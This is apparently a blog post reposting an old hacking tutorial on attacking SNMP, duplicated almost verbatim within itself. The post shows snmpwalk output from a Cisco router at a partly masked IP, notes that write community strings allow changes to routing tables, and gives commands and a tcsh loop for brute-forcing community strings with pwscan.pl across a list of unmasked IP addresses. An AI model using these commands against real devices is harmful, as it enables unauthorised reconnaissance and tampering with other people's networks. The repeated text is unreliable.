SNMP is short for Simple Network Management Protocol and it does just that -
it is used to monitor and manage hosts and routers. The majority of users of
SNMP use it to monitor routers - to show bandwidth utilization and to send
messages to the SNMP monitoring station when a link goes down. The most
common SNMP monitoring software is HP Openview. Attackers use SNMP for
discovering networks and possibly to change or disrupt networking. SNMP on
host (especially NT workstations) are fun - it reveals a lot of interesting
information.
SNMP uses a community name for access control - if you don't have the right
community name you cannot get information from the host or router. The
easiest way of checking a valid community name is using the snmpwalkcommand
(it is bundled with the ucd-snmppackage):
> snmpwalk 196.35.xxx.79 xmax
system.sysDescr.0 = Cisco Internetwork Operating System Software
IOS (tm) 3000 Software (CPA25-CG-L), Version 11.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1996 by cisco Systems, Inc.
Compiled Thu 21-Mar-96 00:29 by hochan
system.sysObjectID.0 = OID: enterprises.9.1.57
---blah blah---
One can see in the above example that a valid community name is "xmax".
There are actually two sorts of community string - a "read" string and a
"write" string. With the write string you would be able to change
information on the host or the router - such as routing tables, IP addresses
assigned to interfaces etc. - with a "read" string you can only get the
information. SNMP uses UDP so make sure you allow UDP to enter your network.
Just like usernames and passwords, community names can also be brute forced.
Again we make use of VLAD's pwscan.plPERL script. Populate the
"community.db" file and let rip:
perl pwscan.pl -v -M 196.35.xxx.79
Did I mention that you could use pwscan.plto scan more than one IP number,
using simple scripting?
> cat > toscanips.txt
196.34.121.1
196.7.18.120
160.124.19.98
^D
> cat > goscan
#!/bin/tcsh
foreach a (`cat toscanips.txt`)
echo working on $a ...
perl pwscan.pl -v -M $a
continue
end
^D
> chmod u+x goscan
> ./goscan
working on 196.34.121.1 ...
--blah blah--
Real easy eh? A Windows program that will provide an excellent "viewer" for
SNMP information is Solarwind's IP browser(get it at
http://www.solarwinds.net/) - it will try to perform a SNMP walk of all
pingable machines in a network. It is not a freeware application, but it's
really good. Another nice feature is that you can supply your own community
strings, and can edit the information if the string allows you to update
information - e.g. a "write" string.
it is used to monitor and manage hosts and routers. The majority of users of
SNMP use it to monitor routers - to show bandwidth utilization and to send
messages to the SNMP monitoring station when a link goes down. The most
common SNMP monitoring software is HP Openview. Attackers use SNMP for
discovering networks and possibly to change or disrupt networking. SNMP on
host (especially NT workstations) are fun - it reveals a lot of interesting
information.
SNMP uses a community name for access control - if you don't have the right
community name you cannot get information from the host or router. The
easiest way of checking a valid community name is using the snmpwalkcommand
(it is bundled with the ucd-snmppackage):
> snmpwalk 196.35.xxx.79 xmax
system.sysDescr.0 = Cisco Internetwork Operating System Software
IOS (tm) 3000 Software (CPA25-CG-L), Version 11.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1996 by cisco Systems, Inc.
Compiled Thu 21-Mar-96 00:29 by hochan
system.sysObjectID.0 = OID: enterprises.9.1.57
---blah blah---
One can see in the above example that a valid community name is "xmax".
There are actually two sorts of community string - a "read" string and a
"write" string. With the write string you would be able to change
information on the host or the router - such as routing tables, IP addresses
assigned to interfaces etc. - with a "read" string you can only get the
information. SNMP uses UDP so make sure you allow UDP to enter your network.
Just like usernames and passwords, community names can also be brute forced.
Again we make use of VLAD's pwscan.plPERL script. Populate the
"community.db" file and let rip:
perl pwscan.pl -v -M 196.35.xxx.79
Did I mention that you could use pwscan.plto scan more than one IP number,
using simple scripting?
> cat > toscanips.txt
196.34.121.1
196.7.18.120
160.124.19.98
^D
> cat > goscan
#!/bin/tcsh
foreach a (`cat toscanips.txt`)
echo working on $a ...
perl pwscan.pl -v -M $a
continue
end
^D
> chmod u+x goscan
> ./goscan
working on 196.34.121.1 ...
--blah blah--
Real easy eh? A Windows program that will provide an excellent "viewer" for
SNMP information is Solarwind's IP browser(get it at
http://www.solarwinds.net/) - it will try to perform a SNMP walk of all
pingable machines in a network. It is not a freeware application, but it's
really good. Another nice feature is that you can supply your own community
strings, and can edit the information if the string allows you to update
information - e.g. a "write" string.
No comments:
Post a Comment